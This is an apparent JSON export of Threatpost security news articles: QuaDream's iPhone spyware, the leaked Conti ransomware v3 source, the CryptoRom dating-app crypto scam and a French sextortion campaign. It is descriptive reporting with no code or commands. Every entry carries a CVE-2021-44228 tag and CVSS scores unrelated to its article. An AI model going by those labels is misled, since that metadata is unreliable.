"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T16:04:36", "id": "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "href": "https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "ForcedEntry \u2013 the exploit of a zero-click iMessage zero day that [circumvented](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) Apple\u2019s then-brand-new BlastDoor security feature starting a year ago \u2013 was picked apart not just by NSO Group with its Pegasus spyware but also by a newly uncovered, smaller smartphone-hacking toolmaker named QuaDream.\n\nReuters [published](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>) details on QuaDream last week. The outlet relied on input from five sources familiar with the matter, plus a look at two QuaDream product brochures dating from 2019 and 2020 that its reporters got their hands on.\n\nThree people familiar with the matter told Reuters that QuaDream and NSO Group have shared employees over the years. Two sources also said that QuaDream and NSO Group came up with the iPhone exploit techniques on their own, separately \u2014 as opposed to collaborating.\n\nIn September, Citizen Lab [published details about having captured](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) NSO Group\u2019s ForcedEntry exploit in the wild, though its security researchers believe that it was first used in February 2021. Apple had just introduced BlastDoor, a structural improvement in iOS 14 meant to block message-based, zero-click exploits \u2013 a month prior to when NSO Group is believed to have started using it.\n\nMonths earlier, in August, the privacy watchdog identified nine Bahraini activists whose iPhones were hacked with NSO Group\u2019s Pegasus spyware between June 2020 and last February. Some of the activists were attacked with what Citizen Lab came to call the 2021 ForcedEntry exploit, while others\u2019 devices were remotely exploited and infected with spyware by [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>): another zero-click iMessage exploit.\n\nBlastDoor was supposed to prevent this type of attack by acting as what Google Project Zero\u2019s Samuel Gro\u00df called at the time a \u201ctightly sandboxed\u201d service responsible for \u201calmost all\u201d of the parsing of untrusted data in iMessages. The ForcedEntry exploit managed to circumvent BlastDoor by targeting Apple\u2019s image rendering library: a sophisticated attack that was effective against Apple iOS, MacOS and WatchOS devices.\n\n## QuaDream Got in on the Fun\n\nQuaDream was allegedly in on the Bahraini malware infections, it turns out, including an attack on one living in London at the time.\n\nAccording to Reuters, the firm was founded in 2016 by Ilan Dabelstein, a former Israeli military official, and by two former NSO employees, Guy Geva and Nimrod Reznik. Reuters\u2019 sources for QuaDream\u2019s background were Israeli corporate records and two people familiar with the business.\n\nIts 2016 founding means that QuaDream has spent more than five years hacking iPhones and other iGadgets, prying them open so as to monitor calls and get access to users\u2019 microphones and cameras in real time. This type of powerful spyware gives its users access to their targets\u2019 email, photos, texts, contacts and instant messages, even in spite of what should be the end-to-end encryption promised by services such as WhatsApp, Telegram or Signal.\n\n## There\u2019s So Much Talent Out There, Unfortunately\n\nCitizen Lab security researcher Bill Marczak, who\u2019s been studying both companies\u2019 tools, told Reuters that the zero-click capability of QuaDream\u2019s flagship product \u2013 called REIGN \u2013 seems \u201con par\u201d with NSO\u2019s Pegasus spyware.\n\nAs Reuters noted, security researchers at Google\u2019s Project Zero have called ForcedEntry [\u201cone of the most technically sophisticated exploits\u201d](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) they\u2019ve ever captured: an estimation confirmed by Citizen Lab director Ronald Deibert.\n\nOn Monday, he pointed to Project Zero\u2019s \u201cvery thorough\u201d analysis of ForcedEntry as having demonstrated the level of engineering talent available to companies like NSO Group and others in the mercenary spyware marketplace.\n\n\u201cThat spyware can be engineered with such sophistication and stealth, and then abused widely to target broad cross sections of civil society, should give everyone serious pause,\u201d he told Threatpost via email.\n\n## Israeli Police Linked to Widespread Pegasus Spying\n\nA related piece of news emerged on Monday. According to a new [report](<https://www.calcalistech.com/ctech/articles/0,7340,L-3928830,00.html>) from the Israeli newspaper Calcalist, dozens of prominent Israelis have been hacked with Pegasus, including a son of former premier Benjamin Netanyahu, activists and senior government officials.\n\n\u201cCEOs of government ministries, journalists, tycoons, corporate executives, mayors, social activists and even the Prime Minister\u2019s relatives, all were police targets, having their phones hacked by NSO\u2019s spyware, prior to any investigation even opening and without any judicial authorization,\u201d Calcalist reported.\n\nPegasus was also recently found on the devices of Finland\u2019s diplomatic corps serving outside the country as part of a wide-ranging espionage campaign, Finnish officials [claimed](<https://threatpost.com/nso-group-pegasus-spyware-finnish-diplomats/178113/>). In December, Pegasus was also [reportedly](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>) planted on the iPhones of at least nine U.S. State Department employees.\n\n## QuaDream: Less Known But Just as Powerful\n\nAccording to QuaDream\u2019s brochures for the REIGN \u201cPremium Collection,\u201d its malware tools offer similar capabilities as Pegasus, including \u201creal-time call recordings,\u201d \u201ccamera activation \u2013 front and back,\u201d and \u201cmicrophone activation,\u201d as Reuters reported.\n\nThe outlet\u2019s sources said that QuaDream and NSO Group share several buyers, including Saudi Arabia and Mexico, both of which are among the many governmental Pegasus buyers that have been accused of illegally using spyware to target political opponents. QuaDream\u2019s first clients also allegedly include the Singaporean government. As well, the firm apparently made a pitch to the Indonesian government, though Reuters couldn\u2019t determine whether Indonesia ponied up.\n\nIts prices appear to vary. According to the 2019 brochure, one offering that gave customers the ability to infect 50 devices per year was priced at $2.2 million, \u201cexclusive of maintenance costs,\u201d though two people familiar with REIGN\u2019s sales told Reuters that the price for REIGN \u201cwas typically higher.\u201d\n\n## How Vast *Is* the Spyware Market?\n\nKudos to Reuters for digging up details on QuaDream: not an easy task, given how murky the company is. It reportedly has no website, and employees have reportedly been told to stay mum about the company on their social-media posts.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, told Threatpost on Monday that discretion is the hallmark of spyware sellers. \u201cEvery intelligence agency worth their salt (or more accurately their budgets) are developing these kinds of exploits in house or via closely-associated companies who do not do business with many other countries,\u201d he said via email. \u201cChina, for instance, has done great work in mobile exploitation that seems to have been government performed effort. For every player we know about, there are dozens that are much more secretive.\u201d\n\nThe fact that there are more spyware-makers than just NSO Group is no shocker.\n\nThat was made clear in December by Meta, Facebook\u2019s parent company, which kicked six alleged spy-for-hire \u201ccyber-mercenaries\u201d [to the curb](<https://threatpost.com/facebook-bans-spy-hire/177149/>), along with a mysterious Chinese law-enforcement supplier. Meta accused the entities of collectively targeting about 50,000 people for surveillance, issued cease-and-desist warnings to six of the groups, and undertook the task of warning targeted people in more than 100 countries.\n\nMike Parkin, engineer at SaaS enterprise cyber-risk remediation firm Vulcan Cyber, told Threatpost that bleeding-edge attacks will continue to appear, given \u201can entire Dark-Web economy built around discovering exploits and selling them to the highest bidder, and state/state-sponsored actors having access to extraordinary financial and technical resources.\u201d\n\nThere are \u201calmost certainly\u201d exploits similar to ForcedEntry already being used in the wild, Parkin said: ones that haven\u2019t yet come to light \u201cbecause they are used sparingly and only against high-value targets.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T18:49:59", "type": "threatpost", "title": "QuaDream, 2nd Israeli Spyware Firm, Weaponizes iPhone Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T18:49:59", "id": "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "href": "https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T22:18:24", "description": "Pro-Ukraine security researcher @ContiLeaks yesterday uploaded a fresher version of Conti ransomware than they had previously [released](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) \u2013 specifically, the source code for Conti Ransomware V3.0 \u2013 to VirusTotal.\n\nContiLeaks [posted a link to the code on Twitter](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUVXkNOpAWYJY6XueO0w9-2BKgfr6VZYiBCbOKrQ0weCr3XPKc3dkrpGerJOdTefZ3TCoZc-2B0Y7hGzuoT1UXn8FeFs-3D56Z8_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTfEiW9vFVpxYjIWX781PN8R8JF7KkBzUFBIwqljzaq4hxtg75rgX2ARPJRi6THB9428J9A4pOlZOyjD3lKJYL-2BVII1slbKZCUMI55aI-2Bs2-2BCOD7PeifEREzeKkYV4EenUehhgk-2Fl3eGsFvB7UbpdYjMCB6POU-2FR41MZnlIWqF5tNXhTpfHUJTNdwA-2FigGi-2FE-2BfNo4-2F6iFaT8lbChTpWXOcdI2a279YUV4EJfNws6TH8P4-3D>). The code includes a compiled locker and decryptor, according to [vx-underground](<https://twitter.com/vxunderground/status/1505555084452798469>), which has been archiving the leaks.\n\nThe archive is password-protected, but the password is easy to figure out, according to replies to ContiLeaks\u2019 release.\n\n> source conti v3. <https://t.co/1dcvWYpsp7>\n> \n> \u2014 conti leaks (@ContiLeaks) [March 20, 2022](<https://twitter.com/ContiLeaks/status/1505433648023146499?ref_src=twsrc%5Etfw>)\n\nContiLeaks followed up in a few hours by [thumbing their nose](<https://twitter.com/ContiLeaks/status/1505479474208559105>) at the pro-Russia law enforcement that the researcher said is looking for them in the UA \u2013 in other words, in Ukraine.\n\n## Crap Code?\n\nThe code is apparently legitimate.\n\nBleepingComputer [compiled](<https://www.bleepingcomputer.com/news/security/more-conti-ransomware-source-code-leaked-on-twitter-out-of-revenge/>) the newly released source code for Version 3 of Conti ransomware without any issues, successfully creating the gang\u2019s executables for encrypting and decrypting files.\n\nBut just because it works doesn\u2019t mean it\u2019s an improvement, some said.\n\nAfter analyzing the source code, Payload \u2013 a Polish magazine about offensive IT security \u2013 [dismissed](<https://twitter.com/PayloadPl/status/1505576996692238341>) Version 3 as being a \u201cgiant step back\u201d from Version 2 in terms of code quality.\n\nMaybe the changes between versions were done by a flunky dev, Payload [suggested](<https://twitter.com/PayloadPl/status/1505576996692238341>) in its response to [vx-underground](<https://twitter.com/vxunderground/status/1505555084452798469>). \u201cWe analyzed it. There is [\u2026] very little improvement, and giant step back in terms of source code quality. Most probably these changes were made by someone else than original developer.\u201d\n\nFor those who are combing through Conti code, you\u2019re better off sticking with the \u201ccleaner\u201d 2.0, Payload [suggested](<https://twitter.com/PayloadPl/status/1505577765592088589>). \u201cBut definitely: if anyone wants to learn anything from this code, please move to Conti 2.0, it\u2019s a lot cleaner and overall better to start with,\u201d Payload said.\n\nRoss Williams, director of digital forensics and incident response (DFIR) at managed detection and response (MDR) services provider CRITICALSTART, told Threatpost on Monday that from a DFIR perspective, these leaks give security professionals and responders \u201cinsight into the gang\u2019s tactics, techniques and procedures as well as indicators of compromise.\u201d The information enables them \u201cto identify a breach or infection more quickly and to thereby slow the spread of ransomware,\u201d Williams said via email.\n\nIt also gives anyone with the motivation and skillset to penetrate a network the tools they need to create their own ransomware gang: The criminally inclined can just use the Conti software along with its training manuals, which were also leaked, noted BreachQuest Head of Product Marco Figueroa.\n\nWith all this access to Conti code, tools and tactics, a hit from \u201cConti\u201d could be close to a hit from \u201cyour guess is as good as mine.\u201d\n\n\u201cI believe the only way to verify that a victim was hit with \u2018Sterns Conti gang\u2019 is by tracking the payment to bitcoin addresses,\u201d Figueroa said. \u201cStern\u201d is a reference to the name used by one of the Conti group\u2019s top managers.\n\n## The Conti Gutting Continues\n\nThis is just the latest in a series of leaks following ContiLeaks\u2019 promise to eviscerate the Conti group \u2013 a promise of revenge that followed Conti\u2019s having[ pledged support](<https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/>) for the Russian government over its invasion of Ukraine.\n\nContiLeaks\u2019 earlier spills included an older version of Conti ransomware source code \u2013 one that dated to Jan. 25, 2021. Version 3.0 \u2013 the one released on Sunday \u2013 is over a year newer.\n\nIn their earlier leaks, ContiLeaks has also divulged [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for TrickBot[ malware](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>), a decryptor and the gang\u2019s administrative panels, among other core secrets.\n\nThe leaks \u2013 an act of revenge wrought upon the cybercrooks who\u2019ve sided with Russia in the war (one among the [thousand cuts](<http://vx-underground>) that have been bleeding Russia as cybercrooks take sides) \u2013 have also included nearly 170,000 chat conversations between the Conti ransomware gang members, covering more than a year from January 2021 through February 2022.\n\nIt\u2019s a treasure trove that researchers have spent weeks poring over, discovering the inner workings of the extortionists\u2019 dark business, its top brass and far more.\n\nFor example, a clear picture of Conti company culture has arisen from the leaks. For one thing, it\u2019s run like a legit high-tech company, offering bonuses, employee-of-the-month and other such benefits, [researchers say](<https://threatpost.com/staff-think-conti-group-legit-employer-podcast/178903/>). Chat logs also have shown that bored top management have mulled working on [something new](<https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/>): say, Conti\u2019s own [altcoin](<https://time.com/nextadvisor/investing/cryptocurrency/altcoins/>) alternative to Bitcoin.\n\n## New Conti Affiliate Discovered\n\nIn related news, on Monday, eSentire\u2019s Threat Research Unit (TRU) published a [report](<https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire>) about a new Conti affiliate group. The report details new accounts, specific IP addresses, domain names and Protonmail email accounts linked to the affiliate, Indicators of Compromise that organizations should address immediately, an overview of attack vectors, and how the affiliate is \u2013 [like so many criminals](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 abusing the Cobalt Strike intrusion framework for attack purposes.\n\neSentire\u2019s report details one such Cobalt Strike incident, nicknamed ShadowBeacon, during which the Cobalt beacons were being deployed from the domain controllers via[ PsExec](<https://attack.mitre.org/software/S0029/>): a legitimate admin tool used for remotely executing binaries.\n\nTogether with BreakPoint Labs (BPL), TRU observed threat actors leveraging the Cobalt Strike infrastructure to attack seven different U.S. companies between 2021 and 2022. According to eSentire, victims included companies in the financial, environmental, legal and charitable sectors.\n\n\u201cThe Windows logs revealed that the threat actor had been able to register their own virtual machine on the victim organization\u2019s network,\u201d the report noted, \u201cusing it as a pivot to their actual, exterior [command-and-control, aka C2, server].\u201d\n\n## Data in Motion Most at Risk in Ransomware Attacks\n\nTo protect from ransomware attacks, Rajiv Pimplaskar, CEO of the VPN company[ Dispersive Holdings,](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUYkvijxYgCuvS2t47ncWcFI-3DcUId_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTfEiW9vFVpxYjIWX781PN8R8JF7KkBzUFBIwqljzaq4hxtg75rgX2ARPJRi6THB9428J9A4pOlZOyjD3lKJYL-2BVCndvSRmk2vKWr2-2F8H36B3qEsvT22-2F665K25o-2BVXN1qn5eeU7TT9vD04P7Kw7dIvT5JGPaQzxYTKwanc-2FCHWfjhtFMP-2BfZgtBLP89vt-2FKVwsmaXd0tyvut19vHQbkEU8JV1jGJ0sOCb4kehgN52J1Ds-3D>) told Threatpost on Monday that organizations should look beyond protecting data at rest: the data that\u2019s at risk of getting paralyzed in a ransomware attack. \u201cInformation is most vulnerable for a data breach or malware infection\u201d when it\u2019s in motion, the CEO cautioned.\n\n\u201cNetwork resources are prime targets for Ransomware as a Service (RaaS) actors as they can be ideal vectors for insider threats, code and injection attacks, Man In The Middle (MITM), privilege escalation as well as lateral movement,\u201d Pimplaskar said via email.\n\nPimplaskar suggested that, beyond establishing proper access control and device posture checking to prevent unauthorized access, \u201cnetwork security must also be bolstered with advanced capabilities such as managed attribution and active data multi-pathing. These capabilities obfuscate network soft targets as well as keep data secure from hostile detection and interception.\u201d\n\n032122 14:90 UPDATE: Added input from Ross Williams.\n\n032122 16:43 UPDATE: Added input from Marco Figueroa.\n\n032122 18:05 Corrected explanation of UA: It is, in fact, the two-letter acronym for Ukraine.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-21T17:48:51", "type": "threatpost", "title": "Conti Ransomware V. 3, Including Decryptor, Leaked", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-21T17:48:51", "id": "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "href": "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T20:53:33", "description": "For about a year now, crypto-traders and lovelorn singles alike have been losing their money to CryptoRom, a malware campaign that combines catfishing with crypto-scamming.\n\nAccording to [research](<https://news.sophos.com/en-us/2022/03/16/cryptorom-bitcoin-swindlers-continue-to-target-vulnerable-iphone-and-android-users/>) from Sophos, CryptoRom\u2019s perpetrators have now improved their techniques. They\u2019re leveraging new iOS features \u2013 [TestFlight](<https://developer.apple.com/testflight/>) and [WebClips](<https://support.apple.com/guide/deployment/%22>) \u2013 to get fake apps onto victims\u2019 phones without being subject to the rigorous app store approval process.\n\nSuccessful CryptoRom scams have resulted in five-, six- and even seven-figure losses for victims.\n\n## What is CryptoRom?\n\nWe do silly things when we\u2019re in love. In fact, [scientifically speaking](<https://link.springer.com/article/10.1007/s10508-015-0589-y>), our inhibitions and decision-making capabilities become impaired in the face of romance and sexual arousal.\n\nPerhaps that\u2019s why hackers have been so successful in targeting dating apps over the years. Last year, the Federal Trade Commission [reported](<https://consumer.ftc.gov/articles/what-you-need-know-about-romance-scams#:~:text=Romance%20scams%20reached%20a%20record,%2C%20Facebook%2C%20or%20Google%20Hangouts.>) that \u201cromance scams\u201d cost U.S. citizens over 300 million dollars in 2020, up 50 percent from 2019.\n\nCapitalizing on this trend, last year a new and well-coordinated campaign began targeting users of dating apps like Bumble, Tinder and Grindr. According to a Sophos [report](<https://news.sophos.com/en-us/2021/10/13/cryptorom-fake-ios-cryptocurrency-apps/>) last fall, the attackers\u2019 M.O. is to begin there, then move the conversation to messaging apps.\n\n\u201cOnce the victim becomes familiar, they ask them to install fake trading applications with legitimate looking domains and customer support,\u201d researchers explained.\n\nThe trading apps tend to be cryptocurrency-related, since, more so than with fiat currency, cryptocurrency payments are [irreversible](<https://www.uschamber.com/co/run/finance/accepting-cryptocurrency-as-payment#:~:text=Cryptocurrency%20transactions%20are%20irreversible&text=%E2%80%9CTransactions%20can%20be%20refunded%20only,has%20paid%2C%E2%80%9D%20wrote%20Inc.>).\n\n\u201cThey move the conversation to investment and ask them to invest a small amount, and even let them withdraw that money with profit as bait,\u201d according to Sophos. \u201cAfter this, they will be told to buy various financial products or asked to invest in special \u2018profitable\u2019 trading events. The new friend even lends some money into the fake app, to make the victim believe they\u2019re real and caring. When the victim wants their money back or gets suspicious, they get locked out of the account.\u201d\n\nThe ruse can go on quite a while before victims catch on. One anonymous person told Sophos that they lost more than $20,000, while another complained of investing $100,000 into the fake app, while bringing a brother and friends into the scheme unwittingly.\n\nIn the worst case thus far, one user wrote that \u201cI have invested all my retirement money and loan money, about $1,004,000. I had no idea that they would freeze my account, requiring me to pay $625,000, which is 20 percent taxes on the total profits before they will unfreeze my account.\u201d\n\nKarl Steinkamp, director at Coalfire, told Threatpost that the scam is a perfect storm of social engineering.\n\n\u201cAn overarching theme here is twofold: One, we are seeing the world\u2019s population rapidly wanting to adopt some format of crypto assets, whether this is Bitcoin, Ethereum or any one of the other 17K+ altcoins,\u201d he said. \u201cAnd two, there is an increasing need for end user (and company) security awareness training when utilizing, storing and transferring any crypto asset. Crypto and digital-asset protection includes different technologies and skills needed to adequately secure the resources.\u201d\n\nHe added, \u201cThe mixing of dating, money / lending, and social-engineering efforts is and will continue to be a potent combination for bad actors to continue to steal money from victims. Bad actors only need to find one crack in the armor, while individuals and companies need to protect against every avenue of threats.\u201d\n\n## What\u2019s New This Time?\n\nA crucial component to the CryptoRom attack flow is those fake apps. Victims might receive a link to download what purports to be BTCBOX, for example, or Binance \u2013 perfectly legitimate cryptocurrency trading platforms. These apps appear to have professional user interfaces, and even come with customer-service chat options.\n\nApple and Google apply strict vetting to weed out malicious mobile apps like these from their official stores. But, as Threatpost has [covered before](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>), hackers have clever tricks to get around conventional security testing. In the past, for example, CryptoRom\u2019s preferred method was to use [the Apple Developer Program and Enterprise Signatures](<https://threatpost.com/cryptorom-scammers-apple-enterprise-features/175474/>).\n\nNow, CryptoRom is taking advantage of two new iOS features.\n\nThe first, TestFlight, is a feature developers can use to distribute beta versions of their apps to testers.\n\n\u201cUnfortunately,\u201d wrote the researchers, \u201cjust as we\u2019ve seen happen with other alternative app distribution schemes supported by Apple, \u2018TestFlight Signature\u2019 is available as a hosted service for alternative iOS app deployment, making it all too simple for malware authors to abuse.\u201d\n\nCryptoRom has shifted from Enterprise Signatures towards TestFlight Signatures because, wrote Sophos, \u201cit is a bit cheaper\u201d \u2013 requiring only an .IPA file with a compiled iOS app. Apps also look \u201cmore legitimate when distributed with the Apple Test Flight App,\u201d researchers added. \u201cThe review process is also believed to be less stringent than App Store review.\u201d\n\n\u201cHackers leveraging Apple\u2019s TestFlight platform as a distribution mechanism for malicious apps is a clever \u2014 and relatively simple \u2014 tactic that can certainly lead to problems for victims,\u201d Ray Kelly, fellow at NTT Application Security, told Threatpost. \u201cUsers should understand that side-loading applications is always a precarious proposition. Apps that are downloaded and installed outside of the of the App Store or Google Play ecosystem have not been vetted for security and privacy risks, leaving the door wide open for attackers to compromise users\u2019 personal data and sometimes, their financial accounts.\u201d\n\nEven more so than TestFlight, CryptoRom attackers have been using WebClips, a feature that allows web links to be added to the iOS home screen like regular apps. Malicious WebClips mimic real apps like RobinHood (in the following case, \u201cRobinHand\u201d).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16132308/RobinHand.png>)\n\nA malicious WebClip offering in the Apple App Store. Source: Sophos.\n\n\u201cIn addition to App Store pages, all these fake pages also had linked websites with similar templates to convince users,\u201d the researchers wrote. \u201cThis shows how cheap and easy it is to mimic popular brands while siphoning thousands of dollars from victims.\u201d\n\nSince it\u2019s almost impossible for law enforcement to crack down on any one individual scam, app store providers hav a responsibility to monitor for misuse of these developer tools, Mark Lambert, vice president of products at ArmorCode, told Threatpost. He added, \u201cUltimately, however, the problem is a lack of security awareness. It is essential that users look for things that \u2018don\u2019t look right\u2019 and have a fundamental view of not trusting electronic communications or taking them on face value.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T17:32:59", "type": "threatpost", "title": "\u2018CryptoRom\u2019 Crypto Scam is Back via Side-Loaded Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T17:32:59", "id": "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "href": "https://threatpost.com/cryptorom-crypto-scam-side-loaded-apple-apps/178942/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:30:25", "description": "A new French-language [sextortion campaign](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>) is making the rounds, researchers warn.\n\nAs noted by Sophos researchers in a Monday [report](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>), sextortion is one of the oldest tricks in the book, but its popularity has waned in recent years due to effective cybersecurity, law enforcement crackdowns and the rise of ransomware.\n\nThis new campaign is one signal of what may be a resurgence, they said.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n## Threats Sandwich Malware Links\n\nThe new French-language attack entails a blind email blast, shown below, with unsubstantiated claims of video evidence and so on. It cites France\u2019s legal penalties for watching illegal pornography, then tells the reader: \u201cIf you wish, you may reply to the address below to explain away your actions, so that we can evaluate your explanation and determine if charges should be brought. You have a strict deadline of 72 hours.\u201d\n\nShould the reader not comply, \u201cwe will are [sic] obliged to send our report to the Public Prosecutor to issue an arrest warrant against you. We will proceed to have you arrested by the police closest to your place of residence.\u201d\n\nNotably, the malicious email contains no plaintext or hyperlinks. Instead, its text is displayed in an image file.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-e1645634734663.png>)\n\nFrench-language sextortion threat email. Source: Sophos.\n\nAttackers use hyperlinks to trick unwitting victims into downloading malware or visiting malicious webpages. As Sophos explains, \u201cAdding an image that holds the call-to-action text obviously makes it harder for a recipient to reply, because a plain image can\u2019t contain clickable links, or even text that can be copied and pasted.\u201d\n\nBut, as Mike Parkin \u2013 senior technical engineer at Vulcan Cyber \u2013 told Threatpost via email, \u201cThe fact that most scams end up in our junk mail folder shows how effective email filters have become, which is why they look to alternative methods like embedded PDFs or images rather than raw text or HTML that is easy for the filters to analyze.\u201d\n\n## What is Sextortion?\n\nSextortion is a form of blackmail in which a malicious actor claims to possess evidence of sexual misbehavior from their victim. The attacker demands payment in exchange for not spreading the compromising information or images.\n\nSometimes, these campaigns can combine with [botnets](<https://threatpost.com/phorpiex-botnet-shifts-ransomware-sextortion/149295/>), [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>) and other methods of cyber attack to form a potent cocktail. However, as [prior](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) [attacks](<https://threatpost.com/sextortionists-defenses-cryptocurrency-shift/148967/>) have shown, sextortion tends to be rudimentary: Such attacks aren\u2019t targeted. Rather, they entail blind email blasts that prey on victims\u2019 fear, without any actual evidence of sexual impropriety to back them up.\n\n## 